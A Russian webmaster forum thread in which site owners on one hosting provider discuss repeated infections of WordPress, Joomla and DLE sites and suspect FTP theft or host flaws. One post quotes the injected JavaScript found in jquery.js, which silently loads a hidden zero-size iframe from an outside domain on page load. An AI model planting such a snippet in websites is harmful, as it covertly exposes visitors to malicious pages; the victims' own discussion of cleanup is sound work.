- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Вообщем, я ухожу от этого хостера, завтра буду бэкапы на новый ставить. Думаю всё норм будет.
Мне кажется сменой хостера проблема не решится, у меня другой хостер и та же проблема. Скорее всего дырка в движке.
Мне кажется сменой хостера проблема не решится, у меня другой хостер и та же проблема. Скорее всего дырка в движке.
У меня тоже хостер другой, вредоносный код тот-же. Грешу на угон фтп пароля.
Решиться, ну по крайней мере пренесу некоторы проекты, надёжнее будет так.
Хостер скорее всего не при чем, совершенно.
FTP / дыра на сайте / взлом админки.
TF-Studio дело может быть не совсем в хостинге, а именно, у меня панель управления файлами(директ-админ), возможно ещё обновили, и туда како йнить код влился, или php-my-admin, там куча сервисных скриптов на хостинге, и так же на других хостингах - похалатничали, а теперь мы страдаем, вот и все дела. И не в сайтах дело, потому что у меня в админке, есть проверка на взлом, если взломают сайт сразу закрываеться, тоесть никто кроме меня туда не залазил. дело 100% в хостинге.
---------- Добавлено 08.08.2013 в 16:28 ----------
Я потом отпишусь, после переезда.
Пока четыре сайта заражены все на хостлайф DLE, wordpress на каждом подгружается разная хрень на wordpress в файле /wp-includes/js/jquery/jquery.js прописано
;var if98B3EY = document.createElement('iframe');if98B3EY.name = 'if98B3EY';if98B3EY.src = 'http://utro.infonev.com/';if98B3EY.style.width = '0px';if98B3EY.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if98B3EY=') == -1) { document.getElementsByTagName('body')[0].appendChild(if98B3EY); document.cookie = 'if98B3EY=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';}};
Хостинг может и не причем, но именно на этом хостинге взламывают второй раз, тот сайт в который вписан выше указанный код я перенес туда 18 июля работает на WordPress 3.5.2. установлены 10 плагинов
После последнего взлома сайта, а именно был подгружен новый файл media/joomgallery/js/thickbox3/js/jquery-latest.pack.js
Восстановился по бекапу, сменил все пароли, удалил лишние плагины и темы.
А сегодня опять появился новый файл
public_html/templates/theme/jquery.js
Самое что обидное дата изменения файла не изменяется. Искал информацию за последнюю неделю по файлам jquery.js, попался только этот топик.
Хостинг все тот же хостлайф, германия.
С саппортом хостлайфа кто-нибудь общался по этой проблеме?
Они за собой ничего не признают?
Сказали что у них все хорошо, уже какой день общаемся. Во всем винят что популярные CMS взламываются, посоветовали права папок изменить и все.
Этот же хостинг, та же проблема.
У меня на всех джумлах была зараза в файлах /media/system/js/caption.js
Сначала дата изменения не менялась, последний раз изенилась у всех на 10 августа. несколько сайтов не чистил, наблюдал.
Похоже схема работы сканирует общедоступный сайт на предмет подключенных js. т.к. на сайтах на yii фрейворке заражены файлы с произвольными названиями. поэтому первым делом нужно проверить подключенные скрипты.
удалял уже раз пять, пароль на фтп поменял. Вроде не помогло.